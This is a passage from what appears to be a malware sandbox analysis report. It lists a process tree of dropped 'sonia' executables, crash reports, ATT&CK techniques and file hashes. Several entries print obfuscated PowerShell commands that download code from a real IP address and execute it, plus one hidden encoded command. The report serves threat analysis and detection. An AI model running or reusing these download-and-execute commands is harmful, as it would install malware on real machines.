                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:4900
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_2.exe
                                                                                                                              sonia_2.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:3652
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 460
                                                                                                                            4⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4872
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3336 -ip 3336
                                                                                                                      1⤵
                                                                                                                        PID:2860
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4000 -ip 4000
                                                                                                                        1⤵
                                                                                                                          PID:4064
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4636 -ip 4636
                                                                                                                          1⤵
                                                                                                                            PID:2672
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1944 -ip 1944
                                                                                                                            1⤵
                                                                                                                              PID:3132
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2268 -ip 2268
                                                                                                                              1⤵
                                                                                                                                PID:2136
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 432
                                                                                                                                1⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4680
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1328 -ip 1328
                                                                                                                                1⤵
                                                                                                                                  PID:4864
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 432
                                                                                                                                  1⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:3904
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 624
                                                                                                                                  1⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:3536
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                  1⤵
                                                                                                                                    PID:5096
                                                                                                                                    • C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5096" "2228" "2192" "2232" "0" "0" "2236" "0" "0" "0" "0" "0"
                                                                                                                                      2⤵
                                                                                                                                        PID:1884
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                      1⤵
                                                                                                                                        PID:480
                                                                                                                                        • C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                          "C:\Windows\system32\wermgr.exe" "-outproc" "0" "480" "2252" "2216" "2256" "0" "0" "2260" "0" "0" "0" "0" "0"
                                                                                                                                          2⤵
                                                                                                                                            PID:5220
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                          1⤵
                                                                                                                                            PID:3672
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                            1⤵
                                                                                                                                              PID:3376
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5092 -ip 5092
                                                                                                                                              1⤵
                                                                                                                                                PID:2732
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2268 -ip 2268
                                                                                                                                                1⤵
                                                                                                                                                  PID:1512
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1944 -ip 1944
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3724
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5092 -ip 5092
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4336
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1328 -ip 1328
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2732
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1328 -ip 1328
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5016
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2984 -ip 2984
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3436
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1328 -ip 1328
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4360
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2152 -ip 2152
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5340
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1328 -ip 1328
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5684
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1096 -ip 1096
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6108
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5312 -ip 5312
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3372
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1328 -ip 1328
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3784
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1328 -ip 1328
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4172
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1328 -ip 1328
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1488
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1328 -ip 1328
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5676
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2984 -ip 2984
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:744
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2984 -ip 2984
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3120
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:2420
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2984 -ip 2984
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3736
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2984 -ip 2984
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1788

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                      Execution

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Persistence

                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                      2
                                                                                                                                                                                      T1031

                                                                                                                                                                                      New Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1050

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                      New Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1050

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                      2
                                                                                                                                                                                      T1112

                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                      1
                                                                                                                                                                                      T1089

                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                      1
                                                                                                                                                                                      T1130

                                                                                                                                                                                      Credential Access

                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                      1
                                                                                                                                                                                      T1081

                                                                                                                                                                                      Discovery

                                                                                                                                                                                      Query Registry

                                                                                                                                                                                      2
                                                                                                                                                                                      T1012

                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                      3
                                                                                                                                                                                      T1082

                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1120

                                                                                                                                                                                      Collection

                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                      1
                                                                                                                                                                                      T1005

                                                                                                                                                                                      Command and Control

                                                                                                                                                                                      Web Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1102

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libcurlpp.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libcurlpp.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libgcc_s_dw2-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libgcc_s_dw2-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libgcc_s_dw2-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libstdc++-6.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libstdc++-6.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libwinpthread-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\libwinpthread-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\setup_install.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d6892cceae68debe671f41037aa40606

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3b01b4101fe4957fa0f3ec27268c78fbfa9d005b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c1d22039337a504f97bd0be4c43fc5d4ae0d0e02bbd373891e80bd15364276fa

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        06b3578b5ac7aab7785f33df99d391c168aa40ab84b22809fa05e4eabd3a18c4ca88537db09fa1fc8272163dc8d62c7682cbebe26bbd5aebddff3e9e8406b2f6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\setup_install.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d6892cceae68debe671f41037aa40606

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3b01b4101fe4957fa0f3ec27268c78fbfa9d005b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c1d22039337a504f97bd0be4c43fc5d4ae0d0e02bbd373891e80bd15364276fa

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        06b3578b5ac7aab7785f33df99d391c168aa40ab84b22809fa05e4eabd3a18c4ca88537db09fa1fc8272163dc8d62c7682cbebe26bbd5aebddff3e9e8406b2f6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_1.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_1.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_2.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        76c579b1dc9fcf508f6db7aeaa611b94

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ec49e6158e628fcf2474b507e90adfad5ed37bc9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        320c673c1b17e5f663d0a299fd03db72ad59b66ca9760b9dc6eb0c378a940bb8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0f24d98a8c0112e5c75b3b575520442dd2f05ecbba51c1f43f3e7eff2eede30b211d68afe7131dd2800bbf4f36bd074dbade3655577039eb302b484a12e3a978

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_2.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        76c579b1dc9fcf508f6db7aeaa611b94

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ec49e6158e628fcf2474b507e90adfad5ed37bc9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        320c673c1b17e5f663d0a299fd03db72ad59b66ca9760b9dc6eb0c378a940bb8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0f24d98a8c0112e5c75b3b575520442dd2f05ecbba51c1f43f3e7eff2eede30b211d68afe7131dd2800bbf4f36bd074dbade3655577039eb302b484a12e3a978

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        7c967f9460daf6223aac5d7d288c7f54

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        7a2440bfc7e2a9e4dc80040e151e8c03ccad2504

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d510b2343e578188cc16f91adc2f477d5a0b43bd4d206f5caace23e5ab494fb3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        236470825a450f78c552b5b2e788ee27858ea8d87eed8dfe773c7328b6d861bd078a9ef461a9697fe35b75bb3201d0b0ed2bef7c41e56fe50bbb6cbf094cd0a6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_3.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        7c967f9460daf6223aac5d7d288c7f54

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        7a2440bfc7e2a9e4dc80040e151e8c03ccad2504

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d510b2343e578188cc16f91adc2f477d5a0b43bd4d206f5caace23e5ab494fb3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        236470825a450f78c552b5b2e788ee27858ea8d87eed8dfe773c7328b6d861bd078a9ef461a9697fe35b75bb3201d0b0ed2bef7c41e56fe50bbb6cbf094cd0a6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_4.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_4.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_5.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        a2a580db98baafe88982912d06befa64

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dce4f7af68efca42ac7732870b05f5055846f0f3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        18310737141e60462bb77bc7e1cd3024fa3308c96f0e2dd37a71b995c72f3a09

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        c4a4887659212674112c4eb40baf2bf227a4b04a9b2c140ea142cc2a47a1cd73c4a0fe6c7cf285f521dd912ef635ae2925ac11bfa9eddbf014493d71e029756b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS451D8BED\sonia_5.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        a2a580db98baafe88982912d06befa64

                                                                                                                                                                                        SHA1

